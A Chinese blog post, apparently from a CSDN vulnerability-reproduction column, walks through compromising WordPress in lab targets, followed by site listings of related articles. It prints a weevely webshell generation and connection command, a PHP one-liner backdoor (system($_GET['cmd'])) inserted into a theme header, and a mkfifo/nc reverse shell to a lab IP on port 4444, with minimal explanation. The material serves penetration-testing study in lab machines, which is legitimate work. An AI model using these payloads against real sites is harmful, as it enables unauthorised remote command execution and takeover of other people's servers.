wordpress测试方法

最新推荐文章于 2023-11-30 09:45:51 发布
最新推荐文章于 2023-11-30 09:45:51 发布
阅读量317 收藏 1
点赞数
分类专栏: 漏洞复现 工具 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/122223231
版权

0x00 工具

wpscan

使用方法如下

https://blog.csdn.net/YouthBelief/article/details/121803913

0x01 知识点

看robots.txt 一般可能存在cms 信息

1.1版本信息

源码 30几行 可看到

在这里插入图片描述
或者wpscan 扫描

1.2目录

登录地址

wordpress/wp-login.php

插件地址

wordpress/wp-content/uploads/

后台地址

wordpress/wp-admin/

数据库文件

wordpress/wp-config.php

0x03 cms 漏洞挖掘

3.1 通过在插件上传木马 getshell

(1)
在这里插入图片描述
(2)kali 工具

	weevely generate shell back.php

在这里插入图片描述

在这里插入图片描述
(3)上传后的插件都存在于 wp-content-uploads 目录
在这里插入图片描述
(4) kali 工具 连接木马

weevely http://192.168.56.109/wordpress/wp-content/uploads/2021/12/back.php shell

在这里插入图片描述

3.2后台模板修改 php代码

Appearance—》Editor–》----》Theme Header—》 插入 php 命令执行 小马 <?php system($_GET['cmd']); ?> 最后保存

(1)
在这里插入图片描述
在这里插入图片描述

(2)访问
http://192.168.56.107/backup_wordpress/?cmd=id;ls

system 命令执行成功
在这里插入图片描述
(3) 执行 bash反弹shell
利用 上边 上传好的 system 一句话木马 反弹
bp 抓包 访问 如下 url
http://192.168.56.107/backup_wordpress/?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.56.137 4444 > /tmp/f

抓包后 将
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.56.137 4444 > /tmp/f
全部 url编码 再放包
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

反弹shell成功

0x04 靶机实例

BsidesVancouver2018

https://blog.csdn.net/YouthBelief/article/details/122112219

Stapler

https://blog.csdn.net/YouthBelief/article/details/121733762

Quaoar

https://blog.csdn.net/YouthBelief/article/details/122220120
LuckyCharm~
关注
专栏目录
wordpress-unit-test-demo:演示如何使用WordPress构建单元测试
05-07
WordPress单元测试演示 演示如何使用WordPress构建单元测试
wordpress本地测试网站
404
08-03 356
创建数据库 安装WampServer本地测试环境,启动WampServer服务。(在本地测试的过程中我们去掉了域名和服务器的绑定,但是mysql必须创建一个wordpress专属的数据库,我们可以用wamp自带的mysql创建)、注:如果以前有安装过mysql软件,那么wamp会显示黄色,这时我们打开运行(windows+R)输入services.msc,关闭mysql服务,重启wamp变绿色表...
如何在您的WordPress网站上设置测验
代码教主
06-21 424
今天,我们将探索WP Quiz插件,该插件可让您在WordPress网站上设置测验。 我们将详细介绍该插件,并以一个真实的示例结尾。 设置在线测验是吸引访问者的最佳方法之一,对他们来说也总是很有趣! 如果您可以有趣的方式展示测验并使它们共享,则可能会给您的网站带来很多流量。 借助即时测验结果,用户会出于好奇而希望进行多次测验,这是您增强品牌形象的机会。 作为站点所有者或经验丰富的Wor...
WPScan使用完整攻略:如何对Wordpress站点进行安全测试
weixin_50464560的博客
08-29 744
https://www.freebuf.com/sectool/174663.html 严正声明:本文仅限于技术探讨,严禁用于其他目的。写在前面的话 在这篇文章中,我将告诉大家如何使用WPScan来对WordPress站点进行安全测试。WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并
WordPress安全检测工具
weixin_30879169的博客
07-08 944
Wordpres是一款非常流行cms系统,市面上有相当一部分的博客和站点都是使用wordpress搭建。正因为大多博客都使用wordpress,所以其安全性就显得尤为重要。 我们平时维护一个站点(不仅仅是wordpress站点)、保证其安全需要从服务器软件更新、浏览器、病毒、口令是否强壮、是否有后门等多方面入手,这种检查必须是非常频繁和及时的。同时,wordpress软件本身又很多漏洞,有时候一...
wordpress网站转移到本地运行测试的方法
12-18
在IT行业中,特别是针对WordPress网站的管理,有时候我们需要在本地环境中进行网站的修改和测试,以确保更改的稳定性和效率。本文将详细讲解如何将一个在线的WordPress网站转移到本地进行测试运行。 首先,进行网站...
WordPress测试
02-26
使用StepZen,Next.js和WordPress静态生成的博客示例 此示例展示了使用作为GraphQL数据源以及使用作为CMS的Next.js的功能。 演示版 自己部署 获得使用部署示例: 如何使用 目录 提升Wordpress环境 填充内容 导入...
WordPress修改评论默认头像的方法
09-28
以上就是如何在WordPress中修改评论默认头像的方法。通过这种方法,网站管理员可以为评论者提供更具个性化的头像,从而提升网站的整体质感和用户体验。这种方法虽然简单,但具有很高的实用价值,能够帮助网站管理者...
wptest, WP测试WordPress的最佳测试.zip
09-18
wptest, WP测试WordPress的最佳测试 描述测试插件是测试插件和主题完整性的一组非常彻底的测试数据。这个测试数据包含了从四年来的主题和插件支持,以及迷惑的角色,创建模拟的复杂的用户内容。WP测试仍然比 WordPress 单元测试 数据提供以下好处。透明度无问题
从本地到WordPress代码注入
蚁景网安学院
09-18 308
什么是create_function?版本影响:注意:create_function在PHP7.2.0之后被废弃,因此该函数的适用范围在PHP 4 >= 4.0.1、PHP 5、 P...
如何对 WordPress 网站进行压力测试
最新发布
sixeit的博客
11-30 176
WordPress 压力测试可让您了解您的网站在高流量情况下的表现。它可以帮助您为流量高峰做好准备,并了解您的网站如何处理负载。通常,网站可以承受的流量取决于您的 WordPress 托管计划。但是,压力测试有助于发现这些限制,并发现由于高流量而可能发生的问题。例如,流量突然激增可能会导致您的网站崩溃并利用所有服务器资源。同样,您还可以查看哪些 WordPress 插件、主题、代码片段和图像在极端条件下出现故障。通过压力测试,您可以轻松修复任何问题或更正可能配置错误的设置。
最好的免费WordPress测验插件
代码教主
06-21 1247
网站上的测验可以达到很多目的。 我敢肯定,您遇到过一些测验,它们只是随机询问有关名人或朋友的趣味。 还有一些测验,例如检查人们的兼容性或能力。 一些网站在课程结束时将测验添加到他们的帖子中,以帮助读者评估他们在学习课程或课程后学到了多少。 有很多免费的WordPress测验插件,您可以在自己的网站上设置测验。 由于不同类型的测验可能有不同类型的问题,因此当选择正确的插件时,它可能会造成很大...
如何在万神殿上自动化和优化WordPress开发和测试
代码教主
06-12 568
在上一教程中 ,我指导您完成了使用Pantheon上的“ Dev-Test-Live”三环境设置创建和维护可安全生产的WordPress网站的步骤。 在这样的配置中,您总是在开发环境中更新代码,然后在测试环境中对其进行测试,只有当一切看起来都很好时,才将其推送到Live服务器。 尽管与运行单环境WordPress安装并将更改直接上传到实时服务器相比,这是一个重大改进,但我们可以做得更好! ...
[wordpress]wp-api-jwt-auth 尝试添加运行在多站点中 need change
weixin_30621919的博客
10-25 260
Hi,Thank you this plugin,because i use this plugin on Wordpress one Network,so the request other api's url will be change. my step is: login : http://localhost/wordpress/wp-json/jwt-auth/v1/token get...
WORDPRESS REST API 学习,使用VSCode 的 REST client 插件测试
哈哈虎的博客
06-27 1144
WORDPRESS 的 REST API 本身是没有身份验证的,我安装了 miniOrange 的 WordPress REST API Authentication免费部分只有 Basic Authentication 和 JWT Authentication ,作为学习 REST API 够用了。一般使用 postman 测试 api ,后来卸载了,现在账号找回密码邮件总是收不到!在VSCode中使用 REST client 来测试也很直观。
Wordpress网站渗透测试(进阶详细思路)
weixin_51957047的博客
05-26 7029
web渗透测试wordpress网站渗透测试思路
wordpress接口-免费wordpress接口配置
qq_787143156的博客
03-21 867
wordpress 接口有很多种,有wordpress 接口翻译、wordpress 接口插件、wordpress 接口调用、wordpress 接口文档、等重要的还是SEO优化。今天就给大家讲解一下怎么对接接口怎么SEO优化。可以通过以下工具实现接口调用并且实现SEO优化。一键建站+文章更新+伪原创+主动推送给搜索引擎收录+自动翻译等 如何有效地进步网站的权重?想要在搜索引擎的排名更靠前、进步整站的流量、进步用户对网站的信任度,所以进步网站的权重是相当重要。如何才能够快速地进步本人网站的权重,或
2019年最佳WordPress测验插件
代码教主
06-22 1067
测验是提高网站访问者参与度并获得潜在业务的一种好方法。 测验不一定需要学术问题。 例如,您可以使用一种方法来帮助访问者弄清楚应该购买哪种产品或应该阅读的书籍。 您也可以创建趣味测验,以娱乐或进一步了解您的访客。 但是,免费插件通常缺少功能,因此如果您遇到困难,则不提供支持。 有时,您可能还必须对通过免费插件添加到所有测验中的插件品牌感到满意。 如果您正在寻找最好的高级WordPress插件...
WordPress优化全面指南
书中强调了作者的写作目的包括测试电子书外链、个人学习成果的总结以及分享实用的WordPress优化策略。" WordPress优化手册详述了以下几个关键知识点: 1. **WordPress基础设置**:这部分内容可能涵盖安装WordPress...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值